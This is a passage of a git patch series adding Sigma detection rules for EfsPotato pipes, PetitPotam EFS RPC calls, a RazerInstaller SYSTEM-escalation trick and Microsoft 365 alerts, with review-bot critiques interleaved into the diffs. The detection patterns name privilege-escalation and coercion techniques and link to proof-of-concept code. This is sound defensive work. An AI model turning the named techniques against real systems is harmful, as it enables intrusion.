637f689e-b4a5-4a86-be0e-0100a0a33ba2 status: experimental description: Detects the pattern of a pipe name as used by the tool EfsPotato references: - - https://twitter.com/SBousseaden/status/1429530155291193354?s=20 - - https://github.com/zcgonvh/EfsPotato + - https://twitter.com/SBousseaden/status/1429530155291193354?s=20 + - https://github.com/zcgonvh/EfsPotato date: 2021/08/23 author: Florian Roth logsource: 
@@ -13,12 +13,14 @@ logsource: definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' detection: selection: - PipeName|contains: '\pipe\' + PipeName|contains: + - '\pipe\' + - '\pipe\srvsvc' # more specific version (use only this one of the other causes too many false positives) condition: selection tags: - - attack.defense_evasion - - attack.privilege_escalation - - attack.t1055 + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 falsepositives: - Unknown level: critical From 037f33b5e200710140d11c9a9c644ddea01addab Mon Sep 17 00:00:00 2001 From: SomeOne Date: Mon, 23 Aug 2021 15:24:48 +0200 Subject: [PATCH 0506/1367] Replace by default windows fieldnames --- rules/windows/builtin/win_event_log_cleared.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 969f0630..92c9a2ea 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -18,9 +18,9 @@ detection: EventID: 1102 condition: selection fields: - - logon_id - - src_user - - src_user_id - - src_nt_domain + - SubjectLogonId + - SubjectUserName + - SubjectUserSid + - SubjectDomainName falsepositives: - Legitimate administrative activity From 96e77eb8db5327a7f45a8fbd6127da1b792c8963 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:06:44 -0400 Subject: [PATCH 0507/1367] Create zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml new file mode 100644 index 00000000..e6f2ddad --- /dev/null 
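Review bot: Adding `\pipe\srvsvc` to a list that still contains `\pipe\` does not narrow anything, because the list is OR-ed: `\pipe\` alone already matches every pipe name, so the rule remains a catch-all at `level: critical` and the inline comment's advice ('use only this one') is not what the rule does. Either remove `'\pipe\'` from the list or move the broad variant into a separate, lower-level rule; as written the comment documents a fix that has not been applied. Note that `srvsvc` is itself the standard server-service pipe, so expect volume even after that change and consider the `falsepositives` entry accordingly.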
+++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml 
@@ -0,0 +1,46 @@ +title: Potential PetitPotam Attack via Usage of Encrypting File System RPC Calls. +id: bae2865c-5565-470d-b505-9496c87d0c30 +Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' +author: '@neu5ron, @Antonlovesdnb, Mike Remen' +date: 2021/08/17 +references: + - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' + - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' + - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' + - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' +tags: + - attack.t1557.001 + - attack.t1187 +logsource: + product: zeek + service: dce_rpc +detection: + efs_operation: + endpoint|startswith: + - 'Efs' + - 'efs' + # EfsDecryptFileSrv' + # EfsRpcAddUsersToFile' + # EfsRpcAddUsersToFileEx' + # EfsRpcCloseRaw' + # EfsRpcDuplicateEncryptionInfoFile' + # EfsRpcEncryptFileExServ' + # EfsRpcEncryptFileSrv' + # EfsRpcFileKeyInfo' + # EfsRpcFileKeyInfoEx' + # EfsRpcFlushEfsCache' + # EfsRpcGetEncryptedFileMetadata' + # EfsRpcNotSupported' + # EfsRpcOpenFileRaw' + # EfsRpcQueryProtectors' + # EfsRpcQueryRecoveryAgents' + # EfsRpcQueryUsersOnFile' + # EfsRpcReadFileRaw' + # EfsRpcRemoveUsersFromFile' + # EfsRpcSetEncryptedFileMetadata' + # EfsRpcWriteFileRaw' + condition: efs_operation +falsepositives: + - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. 
Verify if this is common activity (see description).' +level: medium +status: stable From 78c667fda1980d26915434d4142c3839076efbf6 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:15:30 -0400 Subject: [PATCH 0508/1367] Update zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml shorten title --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 46 ++++++++++++++++++- 1 file changed, 45 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index e6f2ddad..189f1843 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml 
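Review bot: The selection matches `endpoint|startswith: 'Efs'`, but the commented-out names (`EfsRpcOpenFileRaw`, `EfsRpcEncryptFileSrv`, ...) look like values of Zeek's `operation` field rather than `endpoint`, which in dce_rpc.log normally carries the interface name; confirm which field the author intends, otherwise the rule keys on the interface only and the operation list is dead documentation. The `Description:` key is capitalised and is likely to fail the repository's schema checks (`description:`), and `status: stable` for a rule committed this week departs from the `experimental` convention for new rules. Listing both `'Efs'` and `'efs'` is redundant where the backend compares case-insensitively, and the sentence 'from the Source IP to.' in the description is cut off.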
@@ -1,4 +1,48 @@ -title: Potential PetitPotam Attack via Usage of Encrypting File System RPC Calls. +title: Potential PetitPotam Attack via EFS RPC Call +id: bae2865c-5565-470d-b505-9496c87d0c30 +Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' +author: '@neu5ron, @Antonlovesdnb, Mike Remen' +date: 2021/08/17 +references: + - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' + - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' + - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' + - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' +tags: + - attack.t1557.001 + - attack.t1187 +logsource: + product: zeek + service: dce_rpc +detection: + efs_operation: + endpoint|startswith: + - 'Efs' + - 'efs' + # EfsDecryptFileSrv' + # EfsRpcAddUsersToFile' + # EfsRpcAddUsersToFileEx' + # EfsRpcCloseRaw' + # EfsRpcDuplicateEncryptionInfoFile' + # EfsRpcEncryptFileExServ' + # EfsRpcEncryptFileSrv' + # EfsRpcFileKeyInfo' + # EfsRpcFileKeyInfoEx' + # EfsRpcFlushEfsCache' + # EfsRpcGetEncryptedFileMetadata' + # EfsRpcNotSupported' + # EfsRpcOpenFileRaw' + # EfsRpcQueryProtectors' + # EfsRpcQueryRecoveryAgents' + # EfsRpcQueryUsersOnFile' + # EfsRpcReadFileRaw' + # EfsRpcRemoveUsersFromFile' + # EfsRpcSetEncryptedFileMetadata' + # EfsRpcWriteFileRaw' + condition: efs_operation +falsepositives: + - 'Uncommon but legitimate windows administrator or software tasks that 
make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' +level: medium id: bae2865c-5565-470d-b505-9496c87d0c30 Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' author: '@neu5ron, @Antonlovesdnb, Mike Remen' From 6aea58b4d2a4a53bee1426f2d624412be4d210e7 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:18:51 -0400 Subject: [PATCH 0509/1367] Update zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 71 +------------------ 1 file changed, 3 insertions(+), 68 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index 189f1843..f03a8922 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml 
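Review bot: This 'shorten title' commit inserts a second complete copy of the rule above the original body instead of replacing the title line, so the file now carries two `id:`, `Description:`, `detection:` and `level:` keys; a YAML loader will either reject the duplicate keys or silently keep the last one, and the diffstat (`45 insertions(+), 1 deletion(-)`) for a one-word title change is the tell. The hunk should be a single-line change, `-title: Potential PetitPotam Attack via Usage of Encrypting File System RPC Calls.` / `+title: Potential PetitPotam Attack via EFS RPC Call`, with the appended duplicate removed.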
@@ -1,4 +1,4 @@ -title: Potential PetitPotam Attack via EFS RPC Call +title: Potential PetitPotam Attack via EFS RPC Calls id: bae2865c-5565-470d-b505-9496c87d0c30 Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' author: '@neu5ron, @Antonlovesdnb, Mike Remen' 
@@ -17,74 +17,9 @@ logsource: detection: efs_operation: endpoint|startswith: - - 'Efs' - - 'efs' - # EfsDecryptFileSrv' - # EfsRpcAddUsersToFile' - # EfsRpcAddUsersToFileEx' - # EfsRpcCloseRaw' - # EfsRpcDuplicateEncryptionInfoFile' - # EfsRpcEncryptFileExServ' - # EfsRpcEncryptFileSrv' - # EfsRpcFileKeyInfo' - # EfsRpcFileKeyInfoEx' - # EfsRpcFlushEfsCache' - # EfsRpcGetEncryptedFileMetadata' - # EfsRpcNotSupported' - # EfsRpcOpenFileRaw' - # EfsRpcQueryProtectors' - # EfsRpcQueryRecoveryAgents' - # EfsRpcQueryUsersOnFile' - # EfsRpcReadFileRaw' - # EfsRpcRemoveUsersFromFile' - # EfsRpcSetEncryptedFileMetadata' - # EfsRpcWriteFileRaw' + - 'Efs' + - 'efs' condition: efs_operation falsepositives: - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' level: medium -id: bae2865c-5565-470d-b505-9496c87d0c30 -Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' 
-author: '@neu5ron, @Antonlovesdnb, Mike Remen' -date: 2021/08/17 -references: - - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' - - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' - - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' - - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' -tags: - - attack.t1557.001 - - attack.t1187 -logsource: - product: zeek - service: dce_rpc -detection: - efs_operation: - endpoint|startswith: - - 'Efs' - - 'efs' - # EfsDecryptFileSrv' - # EfsRpcAddUsersToFile' - # EfsRpcAddUsersToFileEx' - # EfsRpcCloseRaw' - # EfsRpcDuplicateEncryptionInfoFile' - # EfsRpcEncryptFileExServ' - # EfsRpcEncryptFileSrv' - # EfsRpcFileKeyInfo' - # EfsRpcFileKeyInfoEx' - # EfsRpcFlushEfsCache' - # EfsRpcGetEncryptedFileMetadata' - # EfsRpcNotSupported' - # EfsRpcOpenFileRaw' - # EfsRpcQueryProtectors' - # EfsRpcQueryRecoveryAgents' - # EfsRpcQueryUsersOnFile' - # EfsRpcReadFileRaw' - # EfsRpcRemoveUsersFromFile' - # EfsRpcSetEncryptedFileMetadata' - # EfsRpcWriteFileRaw' - condition: efs_operation -falsepositives: - - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' -level: medium -status: stable From 4f8bd4a5a254489ba43a1a8b8e9287ec7686fa13 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:24:22 -0400 Subject: [PATCH 0510/1367] Update zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml try new uuid to pass check... --- .../zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index f03a8922..b2186f1f 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml 
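Review bot: The removed duplicate tail carried the only `status: stable` line, and the surviving header at the top of the file never had a `status` field, so after this hunk the rule has no `status` at all; add `status: experimental` (more appropriate than `stable` for a new rule) to the retained header. Dropping the commented list of `EfsRpc*` operations also loses the one place that documented which MS-EFSRPC functions the `Efs` prefix is meant to cover — keep it as a comment under `efs_operation`, or fold the names into the description.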
+++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -1,5 +1,5 @@ title: Potential PetitPotam Attack via EFS RPC Calls -id: bae2865c-5565-470d-b505-9496c87d0c30 +id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' author: '@neu5ron, @Antonlovesdnb, Mike Remen' date: 2021/08/17 From 6b86dacc9e1da940324de3c1cab5fbf9b98b15b7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 18:44:15 +0200 Subject: [PATCH 0511/1367] rule: razor installer --- .../win_susp_razorinstaller_explorer.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_razorinstaller_explorer.yml diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml new file mode 100644 index 00000000..967932cc --- /dev/null +++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml 
@@ -0,0 +1,22 @@
+title: Suspicious RazorInstaller Explorer Subprocess
+id: a4eaf250-7dc1-4842-862a-5e71cd59a167
+status: experimental
+description: Detects a explorer.exe sub process of the RazorInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
+references:
+ - https://twitter.com/j0nh4t/status/1429049506021138437
+ - https://streamable.com/q2dsji
+author: Florian Roth
+date: 2021/08/23
+tags:
+ - attack.privilege_escalation
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\explorer.exe'
+ ParentImage|endswith: '\RazorInstaller.exe'
+ condition: selection
+falsepositives:
+ - User selecting a different installation folder (check for other sub processes of this explorer.exe process)
+level: high
\ No newline at end of file
From 998ebbe1f3bcb09ac2ebbf4818a863a5c91c2521 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 18:46:05 +0200 Subject: [PATCH 0512/1367] fix: typo in name --- .../process_creation/win_susp_razorinstaller_explorer.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml
index 967932cc..cffed858 100644
--- a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml
+++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml
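Review bot: `ParentImage|endswith: '\RazorInstaller.exe'` spells the product with an 'o', while the vendor installer the references describe is RazerInstaller, so as committed the selection never matches the binary in question and the title and description carry the same typo (`'\RazerInstaller.exe'`). Beyond the spelling, the escalation case is the one where the installer is started by the plug-and-play service as LOCAL SYSTEM, so if the process-creation source carries user or integrity-level context, constraining the explorer.exe child to that context (e.g. `IntegrityLevel: System`) would remove the false positive named under `falsepositives`; confirm that the legitimate folder-selection path does not also run as SYSTEM before relying on it.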
@@ -1,7 +1,7 @@ -title: Suspicious RazorInstaller Explorer Subprocess +title: Suspicious RazerInstaller Explorer Subprocess id: a4eaf250-7dc1-4842-862a-5e71cd59a167 status: experimental -description: Detects a explorer.exe sub process of the RazorInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM +description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji @@ -15,7 +15,7 @@ logsource: detection: selection: Image|endswith: '\explorer.exe' - ParentImage|endswith: '\RazorInstaller.exe' + ParentImage|endswith: '\RazerInstaller.exe' condition: selection falsepositives: - User selecting a different installation folder (check for other sub processes of this explorer.exe process) From 9d3a13b13e9b372256cd0545e1b27c21a15648a4 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 23 Aug 2021 19:04:01 +0200 Subject: [PATCH 0513/1367] cleanup --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 22 +++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index b2186f1f..c50ceb51 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml 
@@ -1,13 +1,17 @@ -title: Potential PetitPotam Attack via EFS RPC Calls +title: Potential PetitPotam Attack Via EFS RPC Calls id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a -Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' +description: | + Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. + The usage of this RPC function should be rare if ever used at all. + Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. + View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' 
author: '@neu5ron, @Antonlovesdnb, Mike Remen' date: 2021/08/17 references: - - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' - - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' - - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' - - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' + - https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp + - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 + - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf + - https://threatpost.com/microsoft-petitpotam-poc/168163/ tags: - attack.t1557.001 - attack.t1187 @@ -17,9 +21,9 @@ logsource: detection: efs_operation: endpoint|startswith: - - 'Efs' - - 'efs' + - 'Efs' + - 'efs' condition: efs_operation falsepositives: - - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' + - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description). level: medium From ae845594880b7ff3599a21785666bd71fb8dc5fa Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:18:16 +0000 Subject: [PATCH 0514/1367] M365 - Risky IP Addresses --- ...crosoft365_logon_from_risky_ip_address.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml new file mode 100644 index 00000000..0530dbcf --- /dev/null +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml 
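Review bot: The description was converted to a `|` block scalar but the old closing quote survived — the last line still ends in `kerberos, etc..'` — so the stray apostrophe is now literal text in the description; drop it: `... dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.`. While touching the text, 'from the Source IP to.' is an unfinished sentence inherited from the original and reads as if a clause was lost. The second hunk still keeps both `'Efs'` and `'efs'`; one entry suffices where the backend matches case-insensitively.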
@@ -0,0 +1,24 @@ +title: Microsoft 365 - Log on from a risky IP address +id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Log on from a risky IP address" + status: success + condition: selection +falsepositives: + - Unkown +level: medium +tags: + - attack.initial_access + - attack.t1078 \ No newline at end of file From 3a4c61f44d63e584aea5c7abfc3122c39ae4a778 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:21:27 +0000 Subject: [PATCH 0515/1367] M365 - Inbox Manipulation Rules --- ...65_suspicious_inbox_manipulation_rules.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml new file mode 100644 index 00000000..5bcdf480 --- /dev/null +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml 
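Review bot: `falsepositives: - Unkown` is misspelled; this list is surfaced in generated rule documentation, so change it to `- Unknown`, matching the sibling rules in this series. The description also reads awkwardly with its doubled `when` (`Detects when a Microsoft Cloud App Security reported when a user signs into ...`); `Detects when Microsoft Cloud App Security reports a user signing into sanctioned apps from a risky IP address.` states the same thing.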
@@ -0,0 +1,24 @@ +title: Microsoft 365 - Suspicious inbox manipulation rules +id: d2001772-f43f-4def-86d3-a9d5c47588c0 +status: experimental +description: Detects when a Microsoft Cloud App Security reported for suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Suspicious inbox manipulation rules" + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.exfiltration + - attack.t1020.001 \ No newline at end of file From 7d211f2487977101b40188a5252bea4d45f5a945 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:33:00 +0000 Subject: [PATCH 0516/1367] Data exfiltration to unsanctioned apps --- ..._data_exfiltration_to_unsanctioned_app.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml new file mode 100644 index 00000000..1c645f00 --- /dev/null +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml 
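Review bot: The technique tag `attack.t1020.001` (Automated Exfiltration: Traffic Duplication) does not describe an inbox rule that forwards mail; ATT&CK covers this under Email Collection: Email Forwarding Rule, so `- attack.collection` plus `- attack.t1114.003` is the accurate mapping, with `attack.exfiltration` kept as a secondary tactic if desired. The same mapping question applies to `attack.t1020` in the later hunk for `rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml` in this series.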
@@ -0,0 +1,24 @@ +title: Microsoft 365 - Data exfiltration to unsanctioned apps +id: 2b669496-d215-47d8-bd9a-f4a45bf07cda +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Data exfiltration to unsanctioned apps" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.exfiltration + - attack.t1537 \ No newline at end of file From 1834324a160efd896ae3727ed243add9e53d1535 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:33:57 +0000 Subject: [PATCH 0517/1367] Update --- .../m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index 1c645f00..0d55777d 100644 --- a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -8,7 +8,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: From 23e96712f8f0b75d9cf110c8faae4a0821969c8f Mon Sep 17 00:00:00 2001 
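Review bot: `falsepositives:` holds a bare `-` list item, which YAML parses as `[null]`; the repository's rule tests are likely to reject a non-string entry, so this should be `- Unknown` (or a concrete false-positive source) — the follow-up commit in this series fills in only the empty `category:`, not this field. The description's `Detects when a Microsoft Cloud App Security reported when a user or IP address uses ...` also needs a wording pass to remove the doubled `when`.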
From: Austin Songer Date: Mon, 23 Aug 2021 12:59:44 -0500 Subject: [PATCH 0518/1367] Update microsoft365_data_exfiltration_to_unsanctioned_app.yml --- .../microsoft365_data_exfiltration_to_unsanctioned_app.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index 0d55777d..a758f328 100644 --- a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Data exfiltration to unsanctioned apps +title: Microsoft 365 Data exfiltration to unsanctioned apps id: 2b669496-d215-47d8-bd9a-f4a45bf07cda status: experimental description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.exfiltration - - attack.t1537 \ No newline at end of file + - attack.t1537 From 3d151ef9f11255ac582c14e4797cebfb0dacedb8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 12:59:53 -0500 Subject: [PATCH 0519/1367] Update microsoft365_logon_from_risky_ip_address.yml --- rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git 